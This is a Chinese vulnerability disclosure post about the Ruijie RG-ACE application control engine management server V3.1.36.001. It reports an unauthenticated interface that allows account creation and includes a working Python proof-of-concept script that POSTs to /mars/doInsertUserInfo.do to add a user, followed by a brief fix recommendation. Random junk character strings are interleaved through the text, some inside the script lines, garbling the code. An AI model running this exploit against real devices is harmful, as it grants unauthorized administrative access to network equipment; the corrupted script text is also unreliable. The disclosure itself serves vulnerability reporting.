锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
2 `  }4 f0 H( ^) d4 s( G6 q2 p

测试的具体版本是
5 f* d$ m9 e" f! m% I产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730
- }! s; |1 M7 m. k% t) n
& Y: k9 c9 @7 a% G. A! |- [8 ~1 k
$ X+ C  p, I4 L) ?. a- s2 ]漏洞证明：
! p8 V/ a# o, D, y7 W* ~, [# K3 ?
/ E. {: U! w4 r3 i9 Y8 y' L% ?

0 Z0 u( @( u  l4 [


执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
7 C" x9 |" c8 R) nimport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
5 g; B. X% X& Iopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
0 j& j3 F7 ^% r0 ^opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
7 `- J1 @8 m) u1 o; [post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
3 d* [+ k  [; `! C4 `7 E7 e("pwd","aaaaaa"),######密码自己加
6 r: G, h, B& ?2 w("trueName","ad"),
6 ~, B2 d; W- D7 c% {("email",""),
("mobilePhone",""),
( i1 M+ ^' Z, }- A5 V7 @("officePhone",""),
. g( m) p" R& O+ X; Q* r+ H0 a("addr",""),
("submit","确定"))
! @9 v$ R; N1 G  e6 Nurllib2.install_opener(opener)
. g' H; s! [: ?. t! K. b3 R. E/ Cp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

  z) a) j+ _+ s3 [登录，连接设备


' z+ c+ W( j! I8 y. V* v5 @7 |


3 p4 `/ `& O! C% `2 b默认的管理员admin权限更大点
. ]8 x" w" h) j2 p, h6 Y

8 `0 }+ k+ m# b; L0 n
) D; @4 i) w/ C6 s9 r% J

6 K3 F4 i' J, r) n修复方案：
& |9 X7 ^# F, H1 J& T9 o2 P9 U加强对接口的权限验证

8 ^; H. A7 T6 H2 o/ y6 O2 ~! v